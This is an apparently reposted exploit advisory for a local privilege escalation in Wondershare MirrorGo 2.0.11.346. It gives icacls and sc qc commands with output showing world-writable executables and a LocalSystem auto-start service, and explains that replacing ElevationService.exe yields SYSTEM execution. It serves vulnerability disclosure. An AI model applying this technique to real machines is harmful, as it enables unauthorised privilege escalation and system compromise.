BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-23
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/mirror_go_full8050.exe
# Tested Version: 2.0.11.346
# Vulnerability Type: Local Privilege Escalation
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Privilege Escalation:
# Insecure folders permissions issue:
C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe"
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F)
# Service info:
C:\>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ElevationService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Driver Install Service help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A vulnerability was found in Wondershare MirrorGo 2.0.11.346. The Wondershare MirrorGo executable
"ElevationService.exe" has incorrect permissions, allowing a local unprivileged user to replace it
with a malicious file that will be executed with "LocalSystem" privileges.